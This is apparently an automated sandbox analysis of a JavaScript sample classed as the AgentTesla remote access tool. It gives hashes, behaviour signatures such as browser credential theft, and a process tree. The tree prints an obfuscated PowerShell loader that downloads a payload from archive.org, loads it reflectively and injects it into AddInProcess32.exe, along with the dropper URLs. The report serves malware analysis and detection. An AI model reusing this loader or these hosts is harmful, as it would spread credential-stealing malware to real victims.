Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240910-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    20-09-2024 01:11

General

  • Target

    228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457.js

  • Size

    320KB

  • MD5

    b54f5c7cb5ac3d69127941e40966ab0c

  • SHA1

    c75973c8bee061c5e4994e2e9da6ebb830719e31

  • SHA256

    228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457

  • SHA512

    26b0b14d52ed23906448121c2078e032fda790df95cd27c49a888fba3b17f725d494fc89298a6a99e795faa594de1ea4739a113331129bc3395f22a387f53987

  • SSDEEP

    6144:6Xx8rS9pLPEFSkgJisDKPdGuoKeM4k6iPrjt5DiqVAo2JIF1wS8TeBVDm6T3ViZ5:wx2spLPEFSkUisDKVA5k6arjLDi2PmCC

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

exe.dropper

https://ia904601.us.archive.org/6/items/detah-note-j/DetahNoteJ.txt

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, the web browser credential store.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Runs PowerShell with the display window hidden.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempts to gather information about the victim system's language in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\228256bcfebb67586f77a39f116251815bf29a78a2d2a1370016455b9b090457.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3684
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3020
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('E3z'+'url = hizhttps://'+'ia'+'90'+'4601.us.archive.'+'org/6/i'+'tems/det'+'ah-note-'+'j'+'/'+'D'+'etahNoteJ'+'.txt'+'hiz'+';E'+'3z'+'b'+'ase'+'64C'+'ontent'+' ='+' (N'+'ew-Ob'+'j'+'ec'+'t Sy'+'stem.N'+'et.We'+'bCl'+'ie'+'nt).Down'+'lo'+'adString('+'E3z'+'url);E3z'+'binaryCont'+'ent = [System.Con'+'ve'+'rt]::From'+'Bas'+'e64String'+'(E3zbase6'+'4Content);E3'+'zasse'+'mbly = '+'[Re'+'fle'+'ction.Asse'+'mbly]:'+':Load('+'E3zbinaryCo'+'n'+'te'+'nt);E3zty'+'pe '+'='+' E3z'+'as'+'sem'+'bly'+'.G'+'etType'+'(h'+'izRunPE.Homehiz'+')'+';E3z'+'meth'+'od'+' = E3zty'+'pe.G'+'etMet'+'h'+'o'+'d(hizVA'+'I'+'hiz)'+';E3zm'+'ethod.Invo'+'ke(E3znull'+','+' '+'[obje'+'c'+'t['+']]'+'@'+'(hizt'+'xt.991/'+'v'+'e'+'d.'+'2r'+'.47'+'af3'+'2aec8e'+'6'+'0a7827946'+'03'+'c0b134c93-'+'bup'+'//:sptt'+'h'+'h'+'i'+'z , hi'+'zdesati'+'vadohi'+'z , hiz'+'des'+'ativa'+'dohiz ,'+' hizde'+'sati'+'vad'+'ohi'+'z'+','+'hiz'+'Ad'+'dInPr'+'oces'+'s'+'32h'+'iz,hiz'+'desativa'+'dohi'+'z)'+')'+';').REPlACE(([cHaR]69+[cHaR]51+[cHaR]122),'$').REPlACE(([cHaR]104+[cHaR]105+[cHaR]122),[strINg][cHaR]39) |& ( $ENv:COmSpEC[4,24,25]-jOIN'')"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1872
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
          PID:2060
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            PID:3284
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4316

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        f41839a3fe2888c8b3050197bc9a0a05

        SHA1

        0798941aaf7a53a11ea9ed589752890aee069729

        SHA256

        224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

        SHA512

        2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        a6c9d692ed2826ecb12c09356e69cc09

        SHA1

        def728a6138cf083d8a7c61337f3c9dade41a37f

        SHA256

        a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b

        SHA512

        2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wu5k4ece.yc1.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/1872-22-0x0000013D6FF90000-0x0000013D7019C000-memory.dmp

        Filesize

        2.0MB

      • memory/3020-29-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

      • memory/3020-12-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

      • memory/3020-11-0x00007FFBB7F40000-0x00007FFBB8A01000-memory.dmp

        Filesize

        10.8MB

      • memory/3020-1-0x0000023534B00000-0x0000023534B22000-memory.dmp

        Filesize

        136KB

      • memory/3020-0-0x00007FFBB7F43000-0x00007FFBB7F45000-memory.dmp

        Filesize

        8KB

      • memory/4316-23-0x0000000000400000-0x0000000000442000-memory.dmp

        Filesize

        264KB

      • memory/4316-30-0x0000000005C70000-0x0000000006214000-memory.dmp

        Filesize

        5.6MB

      • memory/4316-31-0x0000000005640000-0x00000000056A6000-memory.dmp

        Filesize

        408KB

      • memory/4316-32-0x0000000006A70000-0x0000000006AC0000-memory.dmp

        Filesize

        320KB

      • memory/4316-33-0x0000000006B60000-0x0000000006BF2000-memory.dmp

        Filesize

        584KB

      • memory/4316-34-0x0000000006AE0000-0x0000000006AEA000-memory.dmp

        Filesize

        40KB